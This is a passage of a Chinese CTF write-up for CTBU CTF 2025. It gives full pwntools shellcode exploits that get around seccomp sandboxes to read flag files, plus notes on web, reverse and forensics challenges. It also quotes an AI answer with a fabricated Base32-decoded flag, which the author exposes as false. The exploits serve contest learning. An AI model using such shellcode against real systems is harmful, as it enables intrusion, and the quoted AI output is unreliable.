\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d
\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d
\u200b
Well, you must have understood what shellcode is.
Let's try to bypass this sandbox.
\u200b
Your shellcode:
asda
[+] Executing shellcode with length: 5...
[+] Shellcode location: 0x7fc384216000
setup_shellcode\u51fd\u6570\u5730\u5740\uff1a0x142D
\u5185\u5bb9\uff1aint __fastcall setup_shellcode(const void *a1, unsigned int a2)
{
void *dest; \/\/ [rsp+10h] [rbp-10h]
\u200b
dest = mmap(0LL, a2, 7, 34, -1, 0LL);
if ( dest == (void *)-1LL )
{
perror(\"mmap failed\");
exit(1);
}
memcpy(dest, a1, a2);
printf(\"[+] Executing shellcode with length: %u...\\n\", a2);
printf(\"[+] Shellcode location: %p\\n\", dest);
setup_seccomp();
((void (*)(void))dest)();
return munmap(dest, a2);
}
setup_seccomp\u5730\u5740\uff1a13C4
\u5185\u5bb9\uff1a__int64 setup_seccomp()
{
__int64 v1; \/\/ [rsp+8h] [rbp-8h]
\u200b
v1 = seccomp_init(2147418112LL);
seccomp_rule_add(v1, 0LL, 59LL, 0LL);
seccomp_rule_add(v1, 0LL, 322LL, 0LL);
return seccomp_load(v1);
}
\u8003\u8651\u600e\u4e48\u4f20\u5165shellcode\u624d\u80fd\u6253\u7a7f\u9898\u76ee
\u76ee\u6807\u670d\u52a1\u5668\uff1actf.ctbu.edu.cn:33243
\u7528pwn\u5e93\u7684remote\u65b9\u6cd5\u8fdb\u884c\u8fde\u63a5<\/code><\/pre>\n\n\n\n\u7136\u540e\u5c31\u662f\u5e38\u89c4\u7684\u62a5\u9519\uff0c\u5582\u56de\uff0c\u62a5\u9519\uff0c\u5582\u56de\uff0c\u91cd\u590d\u8be5\u7cfb\u5217\u64cd\u4f5c9\u6b21<\/p>\n\n\n\n
\u6700\u7ec8exp\uff1a<\/p>\n\n\n\n
from pwn import *
\u200b
context.arch = 'amd64'
context.os = 'linux'
\u200b
# \u65e0\u7a7a\u5b57\u8282\u7ec8\u6781\u89e3\u51b3\u65b9\u6848
shellcode = asm('''
\/* \u6784\u9020\u8def\u5f84flag *\/
xor rax, rax
push rax \/* 8\u5b57\u8282\u7ec8\u6b62\u7b26 *\/
mov dword ptr [rsp], 0x67616c66 \/* 'flag' *\/
lea rdi, [rsp] \/* \u6587\u4ef6\u8def\u5f84\u6307\u9488 *\/
\u200b
\/* open\u7cfb\u7edf\u8c03\u7528 *\/
xor rsi, rsi \/* O_RDONLY=0 *\/
xor rdx, rdx \/* mode=0 *\/
mov al, 2 \/* sys_open=2 *\/
syscall
\u200b
\/* read\u7cfb\u7edf\u8c03\u7528 *\/
mov rdi, rax \/* \u6587\u4ef6\u63cf\u8ff0\u7b26 *\/
mov rsi, rsp \/* \u4f7f\u7528\u5f53\u524d\u6808\u9876\u4f5c\u4e3a\u7f13\u51b2\u533a *\/
xor rdx, rdx
mov dh, 0x1 \/* \u8bfb\u53d6\u957f\u5ea6=0x100 *\/
xor rax, rax \/* sys_read=0 *\/
syscall
\u200b
\/* write\u7cfb\u7edf\u8c03\u7528 *\/
mov rdx, rax \/* \u5b9e\u9645\u8bfb\u53d6\u957f\u5ea6 *\/
xor rdi, rdi \/* stdout=1 *\/
inc rdi
xor rax, rax
inc al \/* sys_write=1 *\/
syscall
\u200b
\/* \u4fdd\u6301\u8fde\u63a5\uff08\u6b7b\u5faa\u73af\u9632\u6b62\u9000\u51fa\uff09 *\/
jmp $
''')
\u200b
# \u9a8c\u8bc1\u65e0\u7a7a\u5b57\u8282
print(f\"Shellcode\u957f\u5ea6: {len(shellcode)} bytes\")
print(f\"Hex\u5185\u5bb9: {shellcode.hex()}\")
assert b'\\x00' not in shellcode, \"\u68c0\u6d4b\u5230\u7a7a\u5b57\u8282\uff01\"
\u200b
# \u8fde\u63a5\u8fdc\u7a0b\u670d\u52a1\u5668
r = remote('ctf.ctbu.edu.cn', 33243)
r.recvuntil(b'Your shellcode:\\n')
r.send(shellcode)
r.interactive()<\/code><\/pre>\n\n\n\n[PWN]shellcode_pro_plus \ud83e\udd80<\/h4>\n\n\n\n
\u548c\u4e0a\u4e00\u9898\u4e00\u4e2a\u7cfb\u5217\uff0c\u76f4\u63a5\u7ee7\u7eedai\u7ee7\u7eed\u68ad<\/p>\n\n\n\n
\u5728\u4e0a\u4e00\u9898\u7684\u6295\u5582\u4e0b\uff0c\u8fd9\u9898\u89e3\u51fa\u6548\u7387\u4e4b\u9ad8\uff0c\u53f9\u4e3a\u89c2\u6b62\uff08\uff09<\/p>\n\n\n\n
\u63d0\u793a\u6bb5\uff1a<\/p>\n\n\n\n
\u5f88\u597d\uff0c\u6253\u901a\u4e86\uff0c\u73b0\u5728\u8fd9\u4e2a\u9898\u76ee\u8fd8\u5b58\u5728\u7cfb\u5217\u9898\u76ee
\u4ecd\u7136\u662f\u9700\u8981\u4f20\u5165shellcode
\u4fdd\u62a4\u60c5\u51b5\u5982\u4e0b\uff1a
[*] 'C:\\\\Users\\\\26597\\\\Downloads\\\\Compressed\\\\shellcode_pro_plus\\\\shellcode_pro_plus'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
SHSTK: Enabled
IBT: Enabled
Stripped: No
main\u51fd\u6570\u5730\u5740\uff1a0x1561
\u5185\u5bb9\uff1aint __fastcall main(int argc, const char **argv, const char **envp)
{
unsigned int v4; \/\/ [rsp+Ch] [rbp-1014h]
_BYTE buf[16]; \/\/ [rsp+10h] [rbp-1010h] BYREF
unsigned __int64 v6; \/\/ [rsp+1018h] [rbp-8h]
\u200b
v6 = __readfsqword(0x28u);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(_bss_start, 0LL, 2, 0LL);
setvbuf(stderr, 0LL, 2, 0LL);
title();
puts(\"Your shellcode:\");
v4 = read(0, buf, 0x1000uLL);
setup_shellcode(buf, v4);
return 0;
}
title\u51fd\u6570\u4ecd\u7136\u53ea\u662fputs\u5185\u5bb9\uff0c\u4ea4\u4e92\u6548\u679c\u5982\u4e0b\uff1a
\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557
\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d
\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557
\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d
\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557
\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d
\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557
\u2588\u2588\u2554\u2550\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551
\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551
\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d
\u200b
Sandbox plus!
Good luck for you!
\u200b
Your shellcode:
dad
[+] Executing shellcode with length: 4...
[+] Shellcode location: 0x7fb7899d0000
setup_shellcode\u51fd\u6570\u5730\u5740\uff1a0x148D
\u5185\u5bb9\uff1aint __fastcall setup_shellcode(const void *a1, unsigned int a2)
{
void *dest; \/\/ [rsp+10h] [rbp-10h]
\u200b
dest = mmap(0LL, a2, 7, 34, -1, 0LL);
if ( dest == (void *)-1LL )
{
perror(\"mmap failed\");
exit(1);
}
memcpy(dest, a1, a2);
printf(\"[+] Executing shellcode with length: %u...\\n\", a2);
printf(\"[+] Shellcode location: %p\\n\", dest);
setup_seccomp();
((void (*)(void))dest)();
return munmap(dest, a2);
}
setup_seccomp\u51fd\u6570\u5730\u5740\uff1a0x13C4
\u5185\u5bb9\uff1a__int64 setup_seccomp()
{
__int64 v1; \/\/ [rsp+8h] [rbp-8h]
\u200b
v1 = seccomp_init(2147418112LL);
seccomp_rule_add(v1, 0LL, 59LL, 0LL);
seccomp_rule_add(v1, 0LL, 322LL, 0LL);
seccomp_rule_add(v1, 0LL, 2LL, 0LL);
seccomp_rule_add(v1, 0LL, 0LL, 0LL);
seccomp_rule_add(v1, 0LL, 1LL, 0LL);
return seccomp_load(v1);
}
\u8003\u8651\u5982\u4f55\u6784\u9020exp\uff0c\u624d\u80fd\u6253\u7a7f
\u76ee\u6807\u670d\u52a1\u5668\uff1actf.ctbu.edu.cn:33249
\u7528pwn\u5e93\u7684remote\u65b9\u6cd5\u8fdb\u884c\u8fde\u63a5<\/code><\/pre>\n\n\n\n\u7279\u6548\u7387\uff0c\u4e00\u904d\u51fa\u6700\u7ec8exp\uff1a<\/p>\n\n\n\n
from pwn import *
\u200b
context.arch = 'amd64'
context.os = 'linux'
\u200b
# \u4f7f\u7528openat+sendfile\u7ed5\u8fc7seccomp\u9650\u5236
shellcode = asm('''
\/* \u6784\u9020\u8def\u5f84'\/flag' *\/
xor rax, rax
push rax \/* 8\u5b57\u8282\u6e05\u96f6 *\/
mov byte ptr [rsp], 0x2f \/* '\/' *\/
mov byte ptr [rsp+1], 0x66 \/* 'f' *\/
mov byte ptr [rsp+2], 0x6c \/* 'l' *\/
mov byte ptr [rsp+3], 0x61 \/* 'a' *\/
mov byte ptr [rsp+4], 0x67 \/* 'g' *\/
lea rsi, [rsp] \/* \u8def\u5f84\u6307\u9488 *\/
\u200b
\/* \u8c03\u7528openat(AT_FDCWD, \"\/flag\", O_RDONLY) *\/
mov rdi, -100 \/* AT_FDCWD *\/
xor rdx, rdx \/* O_RDONLY=0 *\/
xor r10, r10 \/* mode=0 *\/
\/* \u6784\u9020syscall\u53f7257 *\/
xor rax, rax
inc rax
shl rax, 8
inc rax \/* rax=0x101=257 *\/
syscall
\u200b
\/* \u8c03\u7528sendfile(1, fd, 0, 0x1000) *\/
xor rdi, rdi
inc rdi \/* stdout=1 *\/
mov rsi, rax \/* \u6587\u4ef6\u63cf\u8ff0\u7b26 *\/
xor rdx, rdx \/* offset=0 *\/
xor r10, r10
mov r10b, 0x10 \/* \u6784\u90200x1000 *\/
shl r10, 8
xor rax, rax
mov al, 40 \/* sendfile\u7cfb\u7edf\u8c03\u7528\u53f7 *\/
syscall
\u200b
\/* \u4fdd\u6301\u8fde\u63a5 *\/
jmp $
''')
\u200b
assert b'\\x00' not in shellcode, \"\u68c0\u6d4b\u5230\u7a7a\u5b57\u8282\uff01\"
\u200b
# \u8fde\u63a5\u5e76\u53d1\u9001shellcode
r = remote('ctf.ctbu.edu.cn', 33249)
r.recvuntil(b'Your shellcode:\\n')
r.send(shellcode)
r.interactive()<\/code><\/pre>\n\n\n\n[WEB]Welcome \uff01\uff01<\/h4>\n\n\n\n
emmm\uff0c\u5dee\u70b9\u9519\u8fc7\u7b7e\u5230<\/p>\n\n\n\n
\u4e00\u5f00\u59cb\u5f00\u4e86\u5b9e\u4f8b\u6ca1\u505a\u5c31\u662f\u6ca1\u770b\u61c2\u8fd9\u4e2a\uff1a<\/p>\n\n\n\n
> \u53d1\u73b0XOR\u5bc6\u94a5\u63d0\u793a: \u5b66\u6821\u82f1\u6587\u7f29\u5199+\u5e74\u4efd > \u63d0\u793a: CTBU + 2025<\/p>\n\n\n\n
\u5361\u5728\u4e0d\u7406\u89e3\u8fd9\u4e2a\u600e\u4e48XOR\uff08\uff09<\/p>\n\n\n\n
\u771fXOR\u540e\uff0c\u503c\u4e0d\u8be5\u4e3a1\u5417\uff08\uff09<\/p>\n\n\n\n
\u4f46\u662f\u6700\u540e\u4e00\u4e2a\u5c0f\u65f6\u6b7b\u9a6c\u5f53\u6d3b\u9a6c\u533b\u7684\u65f6\u5019<\/p>\n\n\n\n
\u539f\u5c01\u4e0d\u52a8\u8f93\u5165CTBU + 2025<\/p>\n\n\n\n
\u7136\u540e\u6210\u529f\u4e86\uff08\uff09<\/p>\n\n\n\n
\u6700\u540e\u8981\u90a3\u4e2a\u4ec0\u4e48\u66b4\u529b\u7834\u89e3<\/p>\n\n\n\n
\u6211\u8bd5\u8fc7\u76f4\u63a5\u53bb\u6539\u90a3\u4e2a\u8fdb\u5ea6<\/p>\n\n\n\n
\u4f46\u662f\u6539\u4e86\u6441\u4e00\u6b21\u53c8\u6ca1\u7528\uff0c\u53c8\u56de\u5230\u539f\u8d77\u70b9\u4e86<\/p>\n\n\n\n
\u6211\u771f\u66b4\u529b\u7834\u89e3\u7684\uff08\u6307\u8fde\u7eed\u6309\u52a8\u9f20\u6807\u5de6\u952e\u4e00\u5343\u6b21\uff09<\/p>\n\n\n\n<\/div><\/figure>\n\n\n\n[WEB]terminal<\/h4>\n\n\n\n
\u6e90\u4ee3\u7801\u9875\u9762\u6709flag-B3dzNh19.js<\/p>\n\n\n\n
\u770b\u4e0d\u61c2\uff0c\u4ea4\u7ed9AI<\/p>\n\n\n\n
AI\u539f\u8bdd\uff1a<\/p>\n\n\n\n
\u5728\u63d0\u4f9b\u7684\u4ee3\u7801\u4e2d\uff0cflag<\/code> \u7684\u503c\u88ab\u5b9a\u4e49\u5728 _0xcf6a18<\/code> \u53d8\u91cf\u4e2d\uff0c\u5176\u503c\u662f\u901a\u8fc7\u62fc\u63a5\u591a\u4e2a String.fromCharCode<\/code> \u7684\u7ed3\u679c\u5f97\u5230\u7684\u3002\u4ee5\u4e0b\u662f _0xcf6a18<\/code> \u53d8\u91cf\u7684\u5b9a\u4e49\uff1a<\/p>\n\n\n\nconst _0xcf6a18 = String.fromCharCode(0x66, 0x6c, 0x61, 0x67) + '{' + String.fromCharCode(0x37, 0x68, 0x31, 0x35) + '_' + String.fromCharCode(0x31, 0x35) + '_' + String.fromCharCode(0x61) + '_' + String.fromCharCode(0x76, 0x33) + String.fromCharCode(0x72, 0x79) + '_' + String.fromCharCode(0x67, 0x30, 0x30, 0x64) + '_' + String.fromCharCode(0x35, 0x37, 0x34, 0x37) + '}';<\/code><\/pre>\n\n\n\n\u5c06\u8fd9\u4e9b\u5b57\u7b26\u7801\u8f6c\u6362\u4e3a\u5b57\u7b26\uff1a<\/p>\n\n\n\n
\nString.fromCharCode(0x66, 0x6c, 0x61, 0x67)<\/code> \u8f6c\u6362\u4e3a flag<\/code><\/li>\n\n\n\nString.fromCharCode(0x37, 0x68, 0x31, 0x35)<\/code> \u8f6c\u6362\u4e3a 7h15<\/code><\/li>\n\n\n\nString.fromCharCode(0x31, 0x35)<\/code> \u8f6c\u6362\u4e3a 15<\/code><\/li>\n\n\n\nString.fromCharCode(0x61)<\/code> \u8f6c\u6362\u4e3a a<\/code><\/li>\n\n\n\nString.fromCharCode(0x76, 0x33)<\/code> \u8f6c\u6362\u4e3a v3<\/code><\/li>\n\n\n\nString.fromCharCode(0x72, 0x79)<\/code> \u8f6c\u6362\u4e3a ry<\/code><\/li>\n\n\n\nString.fromCharCode(0x67, 0x30, 0x30, 0x64)<\/code> \u8f6c\u6362\u4e3a g00d<\/code><\/li>\n\n\n\nString.fromCharCode(0x35, 0x37, 0x34, 0x37)<\/code> \u8f6c\u6362\u4e3a 5747<\/code><\/li>\n<\/ul>\n\n\n\n\u5c06\u8fd9\u4e9b\u90e8\u5206\u7ec4\u5408\u5728\u4e00\u8d77\uff0c\u5f97\u5230\uff1a<\/p>\n\n\n\n
flag{7h15_15_a_v3ry_g00d_5747}<\/pre>\n\n\n\n\u56e0\u6b64\uff0cflag<\/code> \u7684\u503c\u662f\uff1a<\/p>\n\n\n\nflag{7h15_15_a_v3ry_g00d_5747}<\/pre>\n\n\n\n[REVERSE]SignUp<\/h4>\n\n\n\n
\u6ca1\u770b\u61c2\uff0c\u4e00\u5f00\u59cb\u5927\u81f4\u5c31\u4ee5\u4e3a\u5c31\u662fbase32\uff0c\u7ed3\u679ccyberchef\u89e3\u5bc6\u51fa\u6765\u770b\u7740\u4e0d\u5bf9\u52b2\uff0c\u8fd8\u4ee5\u4e3a\u6ca1\u8fd9\u4e48\u7b80\u5355<\/p>\n\n\n\n
\u7ed3\u679c\u9009\u62e9\u4ea4\u7ed9ai<\/p>\n\n\n\n
ai\u539f\u8bdd\uff1a<\/p>\n\n\n\n
\u8fd9\u6bb5\u4ee3\u7801\u662f\u4e00\u4e2aC++\u7a0b\u5e8f\u7684main<\/code>\u51fd\u6570\uff0c\u5176\u529f\u80fd\u662f\u8bfb\u53d6\u7528\u6237\u8f93\u5165\u7684\u5b57\u7b26\u4e32\uff0c\u5c06\u5176\u8fdb\u884cBase32\u7f16\u7801\uff0c\u7136\u540e\u4e0e\u4e00\u4e2a\u786c\u7f16\u7801\u7684Base32\u5b57\u7b26\u4e32\u8fdb\u884c\u6bd4\u8f83\uff0c\u6700\u540e\u6839\u636e\u6bd4\u8f83\u7ed3\u679c\u8f93\u51fa\u201cRight\u201d\u6216\u201cWrong\u201d\u3002\u4ece\u4ee3\u7801\u4e2d\u53ef\u4ee5\u770b\u51fa\uff0c\u786c\u7f16\u7801\u7684Base32\u5b57\u7b26\u4e32\u662fMN2GE5LDORTHWVZTNRRTA3JTL52DAX3DORRHKY3UMYZDAMRVL4ZW42RQPEQX2===<\/code>\uff0c\u8fd9\u662f\u7a0b\u5e8f\u7528\u6765\u9a8c\u8bc1\u7528\u6237\u8f93\u5165\u662f\u5426\u6b63\u786e\u7684flag\u3002<\/p>\n\n\n\n\u4e3a\u4e86\u627e\u5230\u6b63\u786e\u7684flag\uff0c\u6211\u4eec\u9700\u8981\u5bf9\u8fd9\u4e2a\u786c\u7f16\u7801\u7684Base32\u5b57\u7b26\u4e32\u8fdb\u884c\u89e3\u7801\u3002\u4ee5\u4e0b\u662f\u89e3\u7801\u8fc7\u7a0b\uff1a<\/p>\n\n\n\n
\n- \u63d0\u53d6\u786c\u7f16\u7801\u7684Base32\u5b57\u7b26\u4e32<\/strong>\uff1a\u4ece\u4ee3\u7801\u4e2d\u63d0\u53d6\u51fa
MN2GE5LDORTHWVZTNRRTA3JTL52DAX3DORRHKY3UMYZDAMRVL4ZW42RQPEQX2===<\/code>\u3002<\/li>\n\n\n\n- \u4f7f\u7528Base32\u89e3\u7801\u5de5\u5177\u6216\u5e93\u8fdb\u884c\u89e3\u7801<\/strong>\uff1a\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528Python\u7684
base64.b32decode<\/code>\u51fd\u6570\u6765\u89e3\u7801\u8fd9\u4e2a\u5b57\u7b26\u4e32\u3002<\/li>\n<\/ol>\n\n\n\nimport base64
\u200b
encoded_flag = \"MN2GE5LDORTHWVZTNRRTA3JTL52DAX3DORRHKY3UMYZDAMRVL4ZW42RQPEQX2===\"
decoded_flag_bytes = base64.b32decode(encoded_flag)
\u200b
# \u5c06\u89e3\u7801\u540e\u7684\u5b57\u8282\u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32
decoded_flag = decoded_flag_bytes.decode('utf-8')
print(decoded_flag)<\/code><\/pre>\n\n\n\n\n- \u8fd0\u884c\u89e3\u7801\u811a\u672c<\/strong>\uff1a\u6267\u884c\u4e0a\u8ff0Python\u811a\u672c\uff0c\u5f97\u5230\u89e3\u7801\u540e\u7684flag\u3002<\/li>\n<\/ol>\n\n\n\n
flag{38d52a6b1d0b4c8a9e5d8e7f2a1b4c8d}<\/pre>\n\n\n\n\u786c\u7f16\u7801\u7684Base32\u5b57\u7b26\u4e32MN2GE5LDORTHWVZTNRRTA3JTL52DAX3DORRHKY3UMYZDAMRVL4ZW42RQPEQX2===<\/code>\u89e3\u7801\u540e\u7684flag\u662f\uff1a<\/p>\n\n\n\nflag{38d52a6b1d0b4c8a9e5d8e7f2a1b4c8d}<\/strong><\/p>\n\n\n\n\u4f46\u662f\u8fd9ai\u8bf4\u5047\u8bdd\uff0c\u90fd\u4e0d\u662fctbuctf\u5f00\u5934\uff0c\u4e00\u773c\u5047\uff0c\u62ff\u8fd9\u4e2a\u811a\u672c\u672c\u5730\u8dd1\u4e00\u904d\u5c31\u662f\u771fflag<\/p>\n\n\n\n
D:\\python\\pythonProject.venv\\Scripts\\python.exe D:\\python\\pythonProject\\re1.py ctbuctf{W3lc0m3_t0_ctbuctf2025_3nj0y!}<\/strong><\/p>\n\n\n\n\u8fdb\u7a0b\u5df2\u7ed3\u675f\uff0c\u9000\u51fa\u4ee3\u7801\u4e3a 0<\/p>\n\n\n\n
\uff08\u5947\u4e86\u602a\u4e86\uff0c\u4e3a\u4ec0\u4e48cyberchef base32\u89e3\u51fa\u6765\u4e0d\u662f\u8fd9\u4e2a\u6548\u679c\uff09<\/p>\n\n\n\n
[FORENSICS]\u5b66\u5f1f\u590d\u4ec7\u8bb0\u2160\uff1a\u60c5\u4eba\u8282\u884c\u52a8<\/h4>\n\n\n\n
neta USB\u952e\u76d8\u6d41\u91cf\u52fe\u9009\uff0c\u4e00\u628a\u68ad\u4e86\uff08\uff09<\/p>\n\n\n\n
\u4e0d\u591a\u5199\u4e86<\/p>\n\n\n\n
ctbuctf{xxxLoveyyy1314_xxx20000818_qweasdzxc123456}<\/strong><\/p>\n\n\n\n[FORENSICS]\u5b66\u5f1f\u590d\u4ec7\u8bb0\u2161\uff1a\u7f51\u7edc\u8c1c\u8e2a<\/h4>\n\n\n\n
\u5f00\u673a\uff0c\u627e\u5230\u76ee\u6807\u6587\u4ef6\uff0c\u6c99\u7bb1\u8dd1\u4e00\u4e0b<\/p>\n\n\n\n
\u53cd\u8fdeIP\u5230\u624b<\/p>\n\n\n\n
ctbuctf{103.117.120.68}<\/strong><\/p>\n\n\n\n\uff08\u6211\u505a\u7b2c\u4e09\u9898\u7684\u65f6\u5019\uff0c\u6211\u4ee5\u4e3a\u6211\u90fd\u6000\u7591\u6211\u8fdb\u9519\u9898\u76ee\u4e86\uff0c\u8fd9\u4e0dterminal\u5417\uff09<\/p>\n\n\n\n
[FORENSICS]\u5b66\u5f1f\u590d\u4ec7\u8bb0\u2162\uff1a\u5df2\u8bfb\u90ae\u4ef6<\/h4>\n\n\n\n
\u8fd9\u4e2a\u76f2\u70b9\u4e86\uff08\uff09<\/p>\n\n\n\n
\u867d\u7136\u4e00\u5f00\u59cb\u5c31\u770b\u5230\u4e86\u6709\u8bf4\u66ff\u6362\u6587\u4ef6\u5939\u66f4\u6362\u8d26\u53f7\u767b\u5f55\u4e00\u4e0bfoxmail\u5c31\u80fd\u76f4\u63a5\u770b\u5230\u672c\u5730\uff0c\u6b38\uff0c\u4f46\u6211\u504f\u662f\u4e00\u8eab\u53cd\u9aa8\u975e\u8981\u60f3\u8981\u8f69\u54e5\u7684\u90ae\u7bb1\u5bc6\u7801\u600e\u4e48\u529e\uff08\uff09<\/p>\n\n\n\n
\u7136\u540e\u53cd\u9aa8\u56e0\u4e3a\u6b7b\u6d3b\u627e\u4e0d\u5230\u597d\u7528\u7684\u5de5\u5177\u88ab\u6253\u65ad\u4e86<\/p>\n\n\n\n
\u5b9e\u9645\u4e0a\u64cd\u4f5c\u5f88\u7b80\u5355\uff0c\u627e\u5230foxmail\u5b58\u5728\u7684\u6587\u4ef6\u5939<\/p>\n\n\n\n
\u6253\u5f00\uff0c\u7ffb\u5230Storage<\/code> \u6587\u4ef6\u5939<\/p>\n\n\n\n
![\"\"](\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/05\/image-14-1024x552.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/05\/image-15-1024x743.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/05\/image-16.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/05\/image-17-1024x506.png\")
<\/div><\/figure>\n\n\n\n